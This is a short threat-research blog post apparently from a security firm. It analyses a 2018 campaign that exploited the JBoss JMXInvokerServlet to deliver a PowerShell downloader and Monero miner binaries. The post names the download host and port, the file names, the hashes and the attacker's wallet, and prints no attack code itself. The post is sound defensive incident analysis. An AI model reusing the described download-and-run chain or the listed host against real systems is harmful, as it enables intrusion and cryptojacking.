top of page

NINE BOOMS MONERO MINER

On the afternoon of Friday, February 23rd, 2018 the Emagined Security Research team reviewed an alert passed through our Security Operations team involving a JMXInvokerServlet hit.

JMXInoker servlet

Based upon traffic patterns and the user agent strings, the team believes the actor is using JexBoss to automate this exploit.


Within the attack code was an obvious PowerShell Downloader pointing to 200[.]7[.]97[.]205, using port 8086. The IP address is reportedly in the Netherlands.


example of using port 8086

The team immediately captured the text file, which itself was a PowerShell file that downloaded a second stage binary.


second stage binary

The files noted, 32Kilences and 64Kilences.exe provide different versions of the executable file, one for 32 bit windows and another for 64 bit. In Hungarian, Kilences means "Nine."


The team also found that a "lin.txt" is present on the same host, which provides two files, for Linux OS's:


lin.txt file

BoomBoom is a 64bit statically compiled ELF binary, while BoomBoom2 is the 32bit version.


The team set to decompile the binary; which the attackers made very easy:


32Kilences.exe: PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive


After decompressing the RAR self-extracting executable we're provided two new files:

  • MD5 (run.bat) = ac229848385ba895cffd5523602b7162

  • MD5 (systemgo.exe) = 646cb81ec7e8aaa93a7580491edeb56e

SystemGo.exe is a popular Monero miner, and Run.bat gives us all of the important details:


code snippet

The actors Monero wallet, 45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA, is clearly visible in the batch file, and is searchable on MineXMR.com:


monero wallet

With the actor making somewhere around 11 XMR, the current value of Monero puts that around $3228 USD.


xmr to usd conversion

Evidence that even unskilled attackers can use open source technology to make a few dollars.

This campaign has been logged with Alienvault's OTX,


The original win.txt and lin.txt are available here.

Observables:


MD5 (32Kilences.exe) = 5f980357049bec59acf4fa3f64ad076f


MD5 (64Kilences.exe) = 41f120f918d226275471e00f1fd7bd2f


MD5 (win.txt) = e7f9375443cd29f771875c185062c6ba


MD5 (BoomBoom) = f75a3ee5fba082e6ccc38373cff39176


MD5 (BoomBoom2) = 2e49d437c95119becb881a3a269832d6


MD5 (lin.txt) = 0d3784ddb430cdeb2f0641a68b7715e4


SHA1 (32Kilences.exe) = 33a714dd10caf6f7e1ecfd7290de02ac0ef565ac


SHA1 (64Kilences.exe) = 4d17be57e35eecf5a7ba6fa54084179527594635


SHA1 (win.txt) = 7966aba65e7f64a746ecb34eac14f515156a8145


SHA1 (lin.txt) = bf095c444bcae7aae21a4a823e7f83b42a626547


SHA1 (BoomBoom) = 2652eea0140a0b0de3a642b9a0263a7f67ce83ac


SHA1 (BoomBoom2) = 957109bd145306ff38f703d8cd0955f1114c3a85


IP = 200.7.97.205 PORT: 8086

bottom of page